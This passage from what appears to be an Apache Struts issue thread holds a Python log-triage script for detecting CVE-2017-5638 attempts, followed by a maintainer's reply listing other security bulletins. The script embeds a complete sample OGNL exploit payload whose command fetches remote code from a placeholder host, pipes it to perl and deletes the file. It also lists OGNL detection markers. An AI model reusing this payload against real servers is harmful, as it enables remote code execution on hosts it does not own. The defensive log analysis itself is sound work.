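          Both the earlier question about how to trace what happened and the statement above that the WARN entry matches CVE-2017-5638 come down to the same triage step: pull the Content-Type that the "Unable to parse request" WARN line quotes and check it for OGNL sandbox-escape and command-execution identifiers. The script below is an added example and is not code from this thread or from the Struts project. The log lines it scans are constructed for the example (the malicious one is modeled on the WARN entry posted earlier, with the download host replaced by the placeholder attacker.example); the marker list, regexes and function names are this example's own choices, not anything Struts defines.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Identifiers that public CVE-2017-5638 style payloads use to escape the OGNL
# sandbox and start a process. A legitimate Content-Type never contains these.
# (Marker list chosen for this example; extend it for your own log corpus.)
OGNL_MARKERS = (
    "#_memberAccess",
    "ognl.OgnlContext",
    "DEFAULT_MEMBER_ACCESS",
    "getExcludedPackageNames",
    "getExcludedClasses",
    "java.lang.ProcessBuilder",
    "ServletActionContext",
)

# The commons-fileupload WARN entry quotes the offending Content-Type after
# "content type header is"; the stack trace (" at org.apache...") follows it.
CONTENT_TYPE_RE = re.compile(
    r"content type header is (?P<ct>.+?)(?=\s+at org\.apache\.commons\.fileupload|\s*$)",
    re.S,
)
# The shell command the payload assigns to #cmd (single-quoted in OGNL).
CMD_RE = re.compile(r"#cmd='(?P<cmd>[^']*)'")


@dataclass
class Finding:
    line_no: int
    content_type: str
    markers: List[str] = field(default_factory=list)
    command: Optional[str] = None


def extract_content_type(line: str) -> Optional[str]:
    """Return the Content-Type quoted in an 'Unable to parse request' WARN line, or None."""
    m = CONTENT_TYPE_RE.search(line)
    return m.group("ct").strip() if m else None


def ognl_markers(content_type: str) -> List[str]:
    """OGNL expression delimiters plus any sandbox-escape/exec identifiers present."""
    hits = []
    if "%{" in content_type or "${" in content_type:
        hits.append("ognl-expression-delimiter")
    hits.extend(m for m in OGNL_MARKERS if m in content_type)
    return hits


def extract_command(content_type: str) -> Optional[str]:
    """The attacker's #cmd string, which tells you what was fetched and run on the host."""
    m = CMD_RE.search(content_type)
    return m.group("cmd") if m else None


def scan(lines: Iterable[str]) -> List[Finding]:
    """Scan log lines; report only parse failures whose Content-Type carries OGNL markers."""
    findings = []
    for no, line in enumerate(lines, start=1):
        ct = extract_content_type(line)
        if ct is None:
            continue
        markers = ognl_markers(ct)
        if markers:
            findings.append(Finding(no, ct, markers, extract_command(ct)))
    return findings


# Constructed sample log: one benign parse failure, one unrelated line, one injection attempt.
WARN_PREFIX = (
    "WARN org.apache.struts2.dispatcher.multipart.MultiPartRequest (warn:60) - Unable to parse "
    "request org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request "
    "doesn't contain a multipart/form-data or multipart/mixed stream, content type header is "
)
STACK_SUFFIX = " at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:908)"
PAYLOAD = (
    "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
    ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
    ".(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())"
    ".(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http://attacker.example/.jb | perl ; rm -rf .jb*')"
    ".(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
    ".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))"
    ".(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())"
    ".(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
    ".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
)
SAMPLE_LOG_LINES = [
    "2017-03-10 09:12:01 " + WARN_PREFIX + "text/plain" + STACK_SUFFIX,
    "2017-03-10 09:12:05 INFO com.example.app.LoginAction - login ok for user 42",
    "2017-03-10 09:12:09 " + WARN_PREFIX + PAYLOAD + STACK_SUFFIX,
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: OGNL markers {f.markers}")
        print(f"  command: {f.command}")
```

          Run it over the real logs with `scan(open(path, errors="replace"))`; a hit reports the #cmd string, which is what to look for on the host (the downloaded file, the interpreter it was fed to, any cron or startup entries it left). No hits does not mean the box is clean: this WARN is only written when the parser rejects the request, and the other issues in the S2 bulletins for 2.3.1 leave different traces.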
          lukaszlenart Lukasz Lenart added a comment -

          I'm not able to confirm this based on my knowledge; please send any additional information to security@struts.apache.org - this isn't the place to discuss such things.

          Please also note that Struts 2.3.1 has other vulnerabilities, as mentioned on this page [1]; these Security Bulletins refer to Struts version 2.3.1: S2-008, S2-009, S2-010, S2-011, S2-012, S2-013, S2-014, S2-015, S2-016, S2-017, S2-018, S2-019, S2-020, S2-021, S2-022

          [1] http://struts.apache.org/downloads.html

          devulapalli upendar added a comment -

          Thank you


            People

            • Assignee: Unassigned
            • Reporter: devulapalli upendar
            • Votes: 0
            • Watchers: 5
